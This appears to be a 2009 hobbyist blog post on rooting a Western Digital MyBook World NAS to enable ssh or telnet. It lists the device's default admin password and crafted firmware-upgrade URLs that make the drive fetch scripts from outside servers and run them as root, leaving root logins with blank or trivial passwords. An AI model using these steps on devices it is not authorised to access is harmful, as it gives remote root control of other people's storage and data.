2009-01-02

Asmodian's Work Bench: Hacking The WD MyBook NAS Drive

Posted by Joel Kershner

The Project
The WD World Book II is a network attached storage device meant for a typical home or professional user. It varies in storage capacity. At the time of writing the sizes vary between 250GB and 2TB. The device itself is the size of an external USB hard-drive, the larger capacities being wider than the base end models. Inside there is a controller board connected to one or two 3.5 inch hard drives. The Controller is running an ARM processor on 32 mb of ram.

The group at mybookworld.wikidot.com collected some scripts to trick the upgrade feature on the drives web interface to run arbitrary commands as root.

Out of the box, the underlying OS is not available. The goal of this project is to enable the ssh server and/or telnet.

The Process
Side notes on recent firmware revisions. Recent revisions will display an error message, the payload will have still have been run though.


  1. Login to the world book web interface. (the default login is admin : 123456)

  2. Make a user with the web interface

  3. Type the following into your browser : http://(DEVICE IP)/auth/firmware_upgrade.pl?fwserver=martin.hinner.info/mybook/firmware.php or http://(DEVICE IP)/auth/firmware_upgrade.pl?fwserver=mybook1.110mb.com/firmware.php

  4. You will now see a screen telling you that there is a new firmware release available. Click on the "Download and install" button.

  5. The process will take about 5 minutes or less. Then login via ssh as the user you made on step two then su to the root user with a blank password. If you use the alternate firmware site the password is 'root'

Now I would like to say, at this point, with the firmware release I have this did not work for me. If you still cannot login via ssh, try these steps:

  1. Type in http://(DEVICE IP)/auth/firmware_upgrade.pl?fwserver=www.geekoh.com/mybook/telnet

  2. Telnet to the device and login as your user. Then su to root with the password being root or "" depending on which scripts you ran.

Once you have root edit the /etc/inittab file and add "::sysinit:/usr/sbin/sshd".

There is more than enough storage space to work with so there isn't any reason you couldn't run a full LAMP environment off of it along with whatever services you want.

Resources:

The Hacks:

mybookworld.wikidot.com. "hacks and howto" Accessed January, 2009.

Hinner, Martin. "Hacking Western Digital MyBook World Edition" (September 14, 2008) Accessed January, 2009.


Physical Repair:
Pascucci, Mario. "How to Revive Western Digital Mybook World Edition" (July 25, 2007) Accessed January, 2009.

The Device:
Western Digital Corp. "My Book® World Edition™ II" Accessed January, 2009.


Related HiR Articles:
Ax0n. "La fonera lab: Fon unbricking howto", (October 10, 2008) Accessed January, 2009.

Ax0n. "Jasagar Lives Muahahaha" (October 9,2008) Accessed January, 2009.

Labels: , , , , , ,

blog comments powered by Disqus
Subscribe to: Post Comments (Atom)